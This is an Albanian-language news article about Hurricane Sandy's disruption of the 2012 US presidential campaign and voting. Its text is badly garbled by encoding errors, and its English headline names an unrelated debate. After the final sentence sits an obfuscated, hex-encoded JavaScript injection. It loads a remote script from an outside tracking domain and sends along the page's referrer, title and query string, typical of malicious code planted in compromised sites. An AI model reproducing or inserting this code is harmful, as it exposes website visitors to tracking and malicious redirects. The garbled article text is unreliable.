Obama And Romney Square Off In First Presidential Debate In Denver

a�?Sandya�?, a�?tetori befasuesa�� i zgjedhjeve

VetA�m njA� javA� para zgjedhjeve presidenciale tA� 6 nA�ntorit nA� Shtetet e Bashkuara, ardhja e uraganit a�?Sandya�?, stuhisA� masive qA� ka shkatA�rruar njA� pjesA� tA� madhe tA� pjesA�s veri-lindore tA� SHBA-sA�, mund tA� jetA� njA� a�?befasi tetoria�? nA� tA� cilA�n nuk ka llogaritur as presidenti Barack Obama dhe as kandidati republikan Mitt Romney.

a�?Sandya�? e ka prishur kalendarin e fushatA�s edhe tA� ObamA�s edhe tA� Romneyt gjatA� javA�s kryesore tA� fushatA�s. Obama ka anuluar tubimet zgjedhore nA� Florida, Ohio, dhe Virginia tA� hA�nA�n dhe nA� Wiskonsin tA� martA�n, pA�r ta��u kthyer nA� Washington me qA�llim tA� monitorimit tA� stuhisA�.

I pyetur se A�farA� efekti mund te kA�tA� stuhia nA� zgjedhje, Obama tha se fokusi i tij tani A�shtA� reagimi ndaj stuhisA�.

a�?Nuk jam i brengosur tani pA�r tani pA�r ndikimin nA� zgjedhjet (presidenciale). Jam i brengosur pA�r ndikimin(e stuhisA�) mbi familjet, ndikimin mbi ekonominA� dhe transportin tonA�. Zgjedhjet do tA� kujdesen pA�r veten nA� javA�n e ardhshme. Tani pA�r tani prioriteti numA�r njA� yni A�shtA� qA� tA� sigurohemi se po shpA�tojmA� jetA�, qA� ekipet tona tA� kA�rkimit dhe tA� shpA�timit do tA� jenA� nA� vendin e duhur, qA� njerA�zit do tA� marrin ushqim, ujA�, strehim qA� iu duhet nA� rast emergjence dhe qA� tA� reagojmA� sa mA� shpejt qA� tA� jetA� e mundur pA�r tA� kthyer sA�rish ekonominA�a�?, tha Obama.

Romney ka anuluar tubimet e sA� hA�nA�s dhe tA� martA�s nA� Ohio si dhe njA� miting tA� sA� martA�s mbrA�ma nA� New Hampshire, duke bA�rA� tA� ditur gjithashtu se do tA� anulojA� ngjarjet nA� tA� gjithA� vendin a�?pA�r shkak tA� ndjeshmA�risA�a�? sA� situates derisa miliona njerA�z pA�rballen me stuhinA�.

Obama dhe Romney gjithashtu pezulluan a��e-mailet pA�r mbledhjen e fondeve nA� New Jersey, Carolina Veriore, Pennsylvania, Virginia, dhe nA� Distriktin e Kolumbias – tA� gjitha kA�to shtete tA� goditura nga erA�rat e forta tA� stuhisA� si dhe shirat e dendura.

Fushata e Obamas mund tA� ketA� pA�rfituar nga lA�vdata qA� mori tA� martA�n nga guvernatori republikan i New Jersey, njA� nga shtetet qA� u godit mA� sA� keqi nga stuhia.

Guvernatori Chris Christie u shfaq tA� martA�n herA�t nA� programet televizive kombA�tare pA�r ta lavdA�ruar reagimin e Obamas ndaj stuhisA�.
Christie tha se pA�rgjigja federale ndaj stuhisA� nA�n udhA�heqjen e Obamas a�?ka qenA� e shkA�lqyeshmea�? dhe se pA�r kA�tA� a�?A�shtA� shquar presidentia�?.

Ai ka folur tri herA� nA� telefon me ObamA�n tA� hA�nA�n dhe ka marrA� gjithA�ka i A�shtA� dashur nga qeveria federale- pA�rfshirA� edhe deklaratA�n e shpejtuar presidenciale pA�r shpalljen e fatkeqA�sisA� sA� madhe, qA� i ka hapur rrugA�n fondeve federale pA�r gjendjet emergjente.

Ndryshimet nA� orarin e fushatA�s janA� vetA�m pjesA� e paparashikueshme qA� Sandy solli nA� zgjedhje.

Stuhia e detyroi anulimin e votimit tA� hershA�m, qA� duhej tA� zhvillohej tA� hA�nA�n nA� Mariland dhe nA� Distriktin e Columbias. Dy ditA� tA� votimit tA� parakohshA�m janA� anuluar edhe nA� Virginia. PA�r ta��iu dhA�nA� mA� shumA� mundA�si votuesve, zyrtarA�t e zgjedhjeve nA� Virginia kanA� lehtA�suar kA�rkesat pA�r tA� prekurit nga stuhia.

Gjithashtu mund tA� ketA� njA� reduktim tA� numrit tA� sondazheve tA� lA�shuara nga shtetet verilindore nA� javA�n e fundit para votimit.

NdA�rkohA�, janA� ngritur A�A�shtje serioze, se si teknologjia e votimit modern elektronik do tA� funksionojA� pas katastrofA�s- pA�rfshirA� A�A�shtjet logjistike, po qA� se makineritA� e votimit dA�shtojnA� nA� ditA�n e zgjedhjeve.

NA� Nju Jork dhe NewJersey, shumA�A�ka do tA� varet nga aftA�sia e punA�torA�ve tA� infrastrukturA�s, nA�se mund tA� kthejnA� energjinA� elektrike, telefoninA� dhe qasjen nA� internet.

Humbja e kA�saj infrastrukture mund tA� dA�mtojA� pjesA�marrjen nA� qendrat e votimit.

A�A�shtjet legale ia bA�jnA� tA� vA�shtirA� qeverisA� federale qA� tA� shtyjA� zgjedhjet.
Kushtetuta Amerikane ia jep Kongresit autoritetin qA� tA� ndryshojA� datA�n e zgjedhjeve presidenciale. Por, nA� kA�tA� fazA� tA� vonshme, me Kongresin nA� pushim, ligjvA�nA�sit, duket se nuk do ta kenA� mundA�sinA� qA� ta��i shtyjnA� zgjedhjet, edhe po qA� se e dA�shirojnA� njA� gjA� tA� tillA�.

NA�n ligjin federal amerikan, anA�tarA�t e Kolegjit Zgjedhor, qA� e zgjedhin presidentin amerikan, duhet tA� zgjedhen nga vota popullore nA� secilin shtet, tA� martA�n e parA� pas tA� hA�nA�s sA� parA� tA� nA�ntorit.

Por, ligji federal thotA� gjithashtu se nA� qoftA� se njA� shtet ka mbajtur zgjedhjet dhe a�?nuk ka arritur zgjedhA� nA� ditA�n e parashikuar nga ligji, zgjedhA�sit mund tA� caktojnA� njA� ditA� tA� mA�vonshme nA� mA�nyrA�n siA� pA�rcaktohet nga legjislatura e shtetit pA�rkatA�s.a�?

ZyrtarA�t federalA� thonA� se i pA�rket secilit shtet individual qA� tA� vendosA� nA�se zgjedhjet do tA� mund tA� shtyhen. Por, ndA�rsa secili shtet nuk ka fleksibilitet pA�r t’u marrA� me emergjenca, atA�herA� nuk i ushtron as kompetencat e tilla.

Disa shtete mund tA� vendosin, qA� ta��i mbajnA� qendrat e votimit hapur mA� gjatA� se qA� A�shtA� planifikuar ose tA� bA�jnA� ndryshime tA� tjera nA� qendrat e votimit.

EkspertA�t ligjorA� thonA� se A�shtA� e paqartA� nA�se njA� shtet ka autoritetin pA�r tA� shtyrA� zgjedhjet federale, nA� mA�nyrA� qA� tA� merret me rastet emergjente.

NA�se zgjedhjet shtyhen nA� disa shtete, votuesit e atjeshA�m ka tA� ngjarA� qA� tA� dinA� rezultatet nga pjesa tjetA�r e vendit pA�rpara se ta��i hedhin votat e tyre. Kjo do tA� A�ojA� nA� njA� presion tA� madh dhe pA�rqendrim nA� shtetet, qA� mund tA� pA�rcaktojnA� rezultatin e votimit nA� Kolegjin Zgjedhor.

Nuk A�shtA� miratuar ndonjA� plan federal pA�r rastet e paparashikuara, qA� do tA� merrej me ndikimin e katastrofA�s nA� zgjedhjet federale.

Por, FEMA, Agjencia Federale e Menaxhimit tA� Emergjencave – A�shtA� duke u pA�rgatitur edhe pA�r mundA�sinA� e pengimit tA� votimeve nga ana e stuhisA� nA� javA�n e ardhshme.

Administratori i FEMA-s Craig Fugate iu tha gazetarA�ve se kA�shilli i FEMA-s po punon pA�r tA� siguruar se agjencia do tA� ketA� udhA�zimet e duhura ligjore.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}